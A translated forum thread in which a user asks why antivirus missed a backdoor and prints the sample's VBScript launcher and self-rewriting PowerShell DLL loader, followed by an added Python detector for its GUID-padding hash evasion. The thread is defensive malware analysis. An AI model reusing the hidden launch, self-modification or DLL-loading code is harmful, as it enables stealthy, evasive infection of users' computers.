Why can't the virus be detected?
This post was last edited by 单单不知道 on 2025-3-26 12:39. On the firewall I saw a record that a host had a virus [Backdoor Gh0st variant "毒鼠" (Dushu) requesting communication].
I found the host and ran a full-disk scan with 360, but it turned out the infection was still there.
Afterwards I used netstat to find the process and traced it layer by layer; it turned out to be just a scheduled task plus a .ps1 script. Why can't the scanner pick this up?
This post was last edited by 单单不知道 on 2025-3-26 12:44.
I can't post images, and I can't upload attachments either.
There is a Promotions.ps1, working together with a logs.vbs and an update.dll.
Then it seems to pop up a fake auto-update dialog in the bottom-right corner.
' logs.vbs as posted: resolves %APPDATA%\Promotions\Promotions.ps1 and launches it
' through 32-bit PowerShell with the execution policy bypassed, no visible window
' (window style 0) and without waiting for it to finish (False).
Set objShell = CreateObject("WScript.Shell")
RoamingPath = objShell.ExpandEnvironmentStrings("%APPDATA%")
FilePath = RoamingPath & "\Promotions\Promotions.ps1"
objShell.Run "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File """ & FilePath & """", 0, False
--------------------
# cd446a9f-0f7a-4d6c-9690-83345ad03192
# 986c8e2a-44c2-4fea-b39c-92a30683020a
# df8ffc26-00fc-410b-ba61-b2930632657a
# 0877ce74-ec31-4e59-aa33-753341bc8395
# ee50f5b8-17c7-431c-9b7d-480f4287b475
# 068d6abc-de0f-4610-bd2e-7e7487bb125b
# 8514e670-b369-4876-a875-e29d0d937b16
# 595e9138-d7d7-4127-98b2-242a86aea55c
# 9e95823a-c5c5-4279-a3c9-e30995c22003
# 65bb70fe-2ea2-444c-9a9b-581f9090fc71
# 9eba9004-601f-4a0a-9779-4310a646ee93
# 39e43e28-213b-4b5b-8b5f-7f69de41221e
# a84c1659-7e13-4680-bbbf-36f9e998ebfe
# 153145aa-2415-4473-943a-7d4e45efebd8
# 5a5e05f6-75b7-4439-b374-204938e96f40
# e3e92115-d175-49d6-a7d3-78ef769c3ace
# 02c0ddfe-2458-4953-93b4-b7bdf5b8fb4d
# e4ea483c-b327-499d-b68e-a21577220d24
# 2de2f16a-e75a-48cc-9440-bf9c725b5cac
# 58fb079f-76b4-4eb8-831f-c404a1c26c1b
# ea0bd099-3dcf-4b5d-b667-c209c9c39d05
# 5cf23d82-6a6e-46a9-9c5e-35e25f58e791
# 817a78c3-5ae9-45f2-80de-c70b8aba5132
# 7119dd13-55ae-4c0e-8467-659363ec7c11
# 3c5432a3-8eba-4a2c-85b5-957c92b9e916
# Promotions.ps1 as posted. Square-bracket type names such as [Guid] were eaten by the
# forum's BBCode and are restored here. On every run the script prepends "# <guid>" and
# appends "#<guid>" to its own file, which is why the GUID comment lines above and below
# keep accumulating and the file's hash is different after every execution.
$scriptPath = $MyInvocation.MyCommand.Path
$fileContent = Get-Content -Path $scriptPath -Raw
$uuid = [Guid]::NewGuid().ToString()
$randomCommentHeader = "`r`n# $uuid"
$randomCommentFooter = "`r`n#$uuid"
$fileContent = $randomCommentHeader + $fileContent + $randomCommentFooter
Set-Content -Path $scriptPath -Value $fileContent
# Locate the companion DLL under %APPDATA%\Promotions and double the backslashes so the
# path can be embedded in C# source below.
$RoamingDir = [Environment]::GetFolderPath('ApplicationData')
$DllPath = Join-Path $RoamingDir "Promotions\Update.dll"
$DllPathEscaped = $DllPath -replace '\\', '\\\\'
#asd
# Compile a P/Invoke stub at runtime and call the DLL's export. The [DllImport] attribute
# was stripped with the other brackets; it is reconstructed here from the otherwise unused
# $DllPathEscaped variable and the expandable here-string.
$code = @"
using System;
using System.Runtime.InteropServices;
public class DllInvoker
{
    [DllImport("$DllPathEscaped")]
    public static extern void TCGamerUpdateMain();
}
"@
Add-Type -TypeDefinition $code
[DllInvoker]::TCGamerUpdateMain()
# Computes the script's own MD5; the result ($hashBytes) is never used afterwards.
$md5 = [System.Security.Cryptography.MD5]::Create()
$fileStream = [System.IO.File]::OpenRead($scriptPath)
$hashBytes = $md5.ComputeHash($fileStream)
$fileStream.Close()
#3c5432a3-8eba-4a2c-85b5-957c92b9e916
#7119dd13-55ae-4c0e-8467-659363ec7c11
#817a78c3-5ae9-45f2-80de-c70b8aba5132
#5cf23d82-6a6e-46a9-9c5e-35e25f58e791
#ea0bd099-3dcf-4b5d-b667-c209c9c39d05
#58fb079f-76b4-4eb8-831f-c404a1c26c1b
#2de2f16a-e75a-48cc-9440-bf9c725b5cac
#e4ea483c-b327-499d-b68e-a21577220d24
#02c0ddfe-2458-4953-93b4-b7bdf5b8fb4d
#e3e92115-d175-49d6-a7d3-78ef769c3ace
#5a5e05f6-75b7-4439-b374-204938e96f40
#153145aa-2415-4473-943a-7d4e45efebd8
#a84c1659-7e13-4680-bbbf-36f9e998ebfe
#39e43e28-213b-4b5b-8b5f-7f69de41221e
#9eba9004-601f-4a0a-9779-4310a646ee93
#65bb70fe-2ea2-444c-9a9b-581f9090fc71
#9e95823a-c5c5-4279-a3c9-e30995c22003
#595e9138-d7d7-4127-98b2-242a86aea55c
#8514e670-b369-4876-a875-e29d0d937b16
#068d6abc-de0f-4610-bd2e-7e7487bb125b
#ee50f5b8-17c7-431c-9b7d-480f4287b475
#0877ce74-ec31-4e59-aa33-753341bc8395
#df8ffc26-00fc-410b-ba61-b2930632657a
#986c8e2a-44c2-4fea-b39c-92a30683020a
#cd446a9f-0f7a-4d6c-9690-83345ad03192
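Part of the answer to why a full-disk scan keeps missing this file is the self-rewrite above: every run wraps the script in a fresh GUID comment pair, so any signature keyed on the file hash is stale after a single execution. As an added example that is not from this thread, the following Python checker hashes a script with that GUID padding stripped, so the hash stays stable across runs, and flags the behavioural markers visible in the posted logs.vbs and Promotions.ps1. The CORE string is a constructed stand-in for the script body, not the real sample.

```python
import hashlib
import re

# A comment line holding only a GUID: "# <guid>" (prepended) or "#<guid>" (appended)
GUID_COMMENT = re.compile(
    r"^\s*#\s*[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\s*$"
)

# Behavioural markers taken from the posted Promotions.ps1 / logs.vbs
MARKERS = {
    "self_rewrite": re.compile(r"Set-Content\s+-Path\s+\$scriptPath", re.I),
    "dll_import": re.compile(r"DllImport\(", re.I),
    "appdata_dll": re.compile(r"ApplicationData.*\.dll", re.I | re.S),
    "exec_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
}

def normalize(script_text: str) -> str:
    """Drop GUID-only comment lines so the hash covers the real code only."""
    kept = [ln for ln in script_text.splitlines() if not GUID_COMMENT.match(ln)]
    return "\n".join(kept).strip() + "\n"

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def analyze(script_text: str) -> dict:
    """Raw hash, padding-independent hash, padding line count and marker hits."""
    padding = sum(1 for ln in script_text.splitlines() if GUID_COMMENT.match(ln))
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(script_text))
    return {
        "raw_sha256": sha256_hex(script_text),
        "normalized_sha256": sha256_hex(normalize(script_text)),
        "padding_lines": padding,
        "markers": hits,
    }

# Constructed stand-in for the posted script's core (not the real sample)
CORE = (
    "$scriptPath = $MyInvocation.MyCommand.Path\n"
    "$uuid = [Guid]::NewGuid().ToString()\n"
    "Set-Content -Path $scriptPath -Value $fileContent\n"
    "$DllPath = Join-Path ([Environment]::GetFolderPath('ApplicationData')) 'Promotions\\Update.dll'\n"
    '[DllImport("$DllPathEscaped")]\n'
)
# The same core after one and after two runs of its self-padding routine
RUN1 = "\r\n# 11111111-2222-3333-4444-555555555555\r\n" + CORE + "\r\n#11111111-2222-3333-4444-555555555555"
RUN2 = "\r\n# aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee" + RUN1 + "\r\n#aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"

if __name__ == "__main__":
    for name, text in (("run1", RUN1), ("run2", RUN2)):
        print(name, analyze(text))
```

Running it shows the two raw hashes differ while the normalized hashes match, which is the property a file-hash signature for this family would need.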
Hello, please add me on WeChat and send me the sample.
360 still has things it can't detect. I have both 360 Security Guard and Kaspersky Anti-Virus installed and use them together: 360 as the main defense, Kaspersky doing scheduled full-disk scans. Sure enough, some websites quietly download scripts and run them; going by Kaspersky's names for them, they are adware plugins or rogue plugins.